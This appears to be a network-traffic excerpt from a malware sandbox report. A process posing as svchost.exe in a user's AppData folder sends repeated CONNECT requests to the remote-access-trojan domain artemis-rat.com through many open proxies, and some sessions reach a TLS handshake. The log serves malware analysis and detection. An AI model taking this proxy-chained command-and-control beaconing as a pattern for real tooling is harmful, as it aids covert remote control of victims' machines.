Mar 9, 2024 13:14:27.988004923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1884	192.168.2.5	55571	203.188.245.98	52837	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.996282101 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1885	192.168.2.5	55785	52.13.248.29	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.004621983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.197791100 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:28 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1886	192.168.2.5	55679	128.140.26.12	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.015547991 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1887	192.168.2.5	55701	46.17.63.166	9480	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.026609898 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.322856903 CET	339	IN	HTTP/1.1 403 Forbidden Server: squid/4.7 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html;charset=utf-8 Content-Length: 5 X-Squid-Error: TCP_RESET 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from proxy.wakoopa.com Via: 1.1 proxy.wakoopa.com (squid/4.7) Connection: keep-alive Data Raw: 72 65 73 65 74 Data Ascii: reset

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1888	192.168.2.5	55705	52.16.232.164	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.032847881 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.336133003 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:28 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1889	192.168.2.5	55831	104.20.233.70	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.041192055 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.195708990 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1890	192.168.2.5	55714	88.198.82.189	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.050112963 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.364538908 CET	92	IN	HTTP/1.0 200 Connection established Proxy-agent: Kerio Control/9.4.2 patch 1 build 7290

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1891	192.168.2.5	56028	36.94.2.138	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.054208994 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1892	192.168.2.5	56029	36.94.2.138	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.054902077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1893	192.168.2.5	55843	45.12.31.3	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.055028915 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.209604025 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1894	192.168.2.5	56031	36.94.2.138	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.055522919 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1895	192.168.2.5	56033	36.94.2.138	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.056265116 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1896	192.168.2.5	55847	185.162.230.201	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.058954000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.213136911 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1897	192.168.2.5	55747	138.68.155.22	11712	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.062728882 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.870660067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.880415916 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.677212954 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1898	192.168.2.5	55587	94.131.63.120	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.066034079 CET	1260	IN	HTTP/1.1 403 Forbidden Server: squid/6.0.0-20220501-re899e0c27 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:27 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3670 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en Cache-Status: ezproxies.com Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27) Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-seri

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1899	192.168.2.5	55856	104.22.1.113	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.068859100 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.223542929 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1900	192.168.2.5	55861	104.18.220.95	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.070951939 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.225425959 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1901	192.168.2.5	55669	103.163.51.254	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.088821888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.489624023 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1902	192.168.2.5	55797	52.196.1.182	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.090589046 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.356450081 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:28 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:28.356853008 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a3 88 a2 1e 4e fb 89 34 1f 4a 63 25 cd 98 45 d4 41 3c 25 55 a5 82 c9 54 21 2a 89 49 1f 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eRN4Jc%EA<%UT!I,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:28.622718096 CET	1079	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 bb f9 c9 50 c9 13 52 bb 77 33 53 ee c7 7b ec e4 a6 38 d5 a2 7c 72 29 c4 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9PRw3S{8\|r)DOWNGRD0000H010Uartemis-rat.com0240309120120Z260309120120Z010Uartemis-rat.com0"0H0LU,m-YLa
Mar 9, 2024 13:14:28.652146101 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 b5 57 1b 35 e3 da 34 ec b4 83 a6 43 65 88 4b e5 4b 44 08 bf b5 06 71 d8 57 b3 d0 eb 09 43 84 11 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 44 fc 85 c5 ac 4d 83 ea 20 96 2c e4 50 f3 6c bb ca 6a 4c 4a ba Data Ascii: %! W54CeKKDqWC(DM ,PljLJ9O%iUq
Mar 9, 2024 13:14:28.917061090 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 fc 12 c1 26 93 b7 5a 91 ed 99 ec 63 e9 59 5a 0c 1b 78 3e 64 ea 08 38 12 47 82 9e 33 7f 9b d4 0e 8d cd 5b e9 fe a0 fd 09 Data Ascii: (&ZcYZx>d8G3[

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1903	192.168.2.5	55642	102.132.201.202	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.121340036 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.940201044 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1904	192.168.2.5	55732	134.209.105.209	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.121387005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.469595909 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1905	192.168.2.5	55894	142.4.123.41	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.122670889 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1906	192.168.2.5	55787	51.89.173.40	3100	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.123049021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
